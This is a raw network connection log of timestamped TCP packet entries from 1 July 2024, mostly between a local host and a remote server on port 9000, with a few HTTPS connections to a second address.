Jul 1, 2024 09:16:31.881808043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.881819963 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.881833076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.881860018 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.881886959 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.884160995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.884216070 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.884223938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.884234905 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.884272099 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.886905909 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.886918068 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.886977911 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887052059 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887063980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887075901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887099028 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887125969 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887316942 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887330055 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887341022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887351036 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887355089 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887367964 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887372971 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887397051 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887437105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887448072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887475967 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887491941 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887646914 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887660027 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887671947 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887681961 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887692928 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887692928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887717962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887734890 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887830019 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887876987 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.887957096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887968063 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.887979984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.888005972 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.888027906 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.888179064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.888191938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.888201952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.888223886 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.888281107 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.888317108 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.889261007 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.889273882 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.889286041 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.889297962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.889318943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.890758991 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.890770912 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.890782118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.890800953 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.890820026 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.892097950 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.892108917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.892127991 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.892137051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.892158985 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.892194986 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.893455982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.893466949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.893477917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.893488884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.893527031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.893554926 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.894776106 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.894840956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.894841909 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.894855976 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.894898891 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.897475004 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.897517920 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.897566080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.897576094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.897587061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.897607088 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.897628069 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.899266005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.899286032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.899298906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.899310112 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.899329901 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.899377108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.899388075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.899456024 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906308889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906363010 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906364918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906374931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906399965 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906403065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906414032 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906443119 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906532049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906544924 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906557083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906567097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.906574011 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906594038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.906620026 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.910675049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910685062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910720110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910729885 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.910763979 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.910806894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910819054 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910830975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910844088 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.910855055 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.910881996 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.919126987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919140100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919152975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919182062 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.919205904 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.919229984 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919240952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919258118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919275999 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.919287920 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.919364929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.919584036 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.924352884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924408913 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.924413919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924426079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924458027 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.924484968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924503088 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924516916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924530029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924540043 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.924541950 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.924568892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.924583912 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.932934046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.932956934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.932969093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.932981968 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.933007956 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.933026075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.933037996 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.933049917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.933063030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.933070898 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.933088064 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.933113098 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.945259094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.945272923 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.945280075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.945321083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.945355892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.946295023 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.946306944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.946320057 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.946331024 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.946345091 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.946382046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.974376917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974394083 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974405050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974448919 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.974463940 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.974463940 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974478006 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974489927 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974502087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974514961 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.974536896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.974539995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.974647999 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.986805916 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.986818075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.986838102 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.986846924 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.986850977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.986861944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.986864090 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.986881971 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.986907959 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.986987114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.987006903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.987018108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.987025976 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.987054110 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.987880945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.987921000 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.988029957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.988042116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.988068104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.988068104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.988085032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.988090038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.988109112 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.988116980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.988173008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.988184929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.988234997 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.990466118 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990542889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990554094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990586996 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990591049 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.990600109 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990611076 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990621090 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.990639925 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.990653038 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.990663052 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.990722895 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.002890110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.002902985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.002917051 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.002938986 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.002954006 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.002983093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.002995968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.003021002 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.003043890 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.003484011 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.003496885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.003532887 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.003545046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007051945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007124901 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007128954 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007137060 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007177114 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007190943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007204056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007215977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007227898 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007247925 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007313967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007325888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007338047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007360935 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007373095 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007376909 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007385969 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007397890 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007410049 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007410049 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007421970 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007426023 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007446051 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007467031 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007742882 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007755995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007792950 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007805109 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007833958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007847071 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007859945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007872105 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007884026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.007899046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.007914066 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.008846998 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.008878946 CEST	443	49788	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.008984089 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.010394096 CEST	49788	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.010407925 CEST	443	49788	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.013529062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013567924 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013581038 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013600111 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013612986 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013617039 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.013623953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013634920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.013663054 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.013679028 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.016132116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016181946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016192913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016227007 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.016246080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016257048 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016263008 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.016269922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016289949 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.016311884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.016315937 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.016355038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.017074108 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017122030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.017241001 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017252922 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017263889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017277956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017290115 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017294884 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.017302036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017313957 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.017348051 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.017662048 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017673969 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017685890 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017697096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.017713070 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.017738104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.018012047 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.018023968 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.018035889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.018048048 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.018060923 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.018081903 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.018707991 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.018791914 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:32.018853903 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:32.019488096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019501925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019511938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019524097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019536018 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.019550085 CEST	9000	49782	195.201.251.214	192.168.2.4
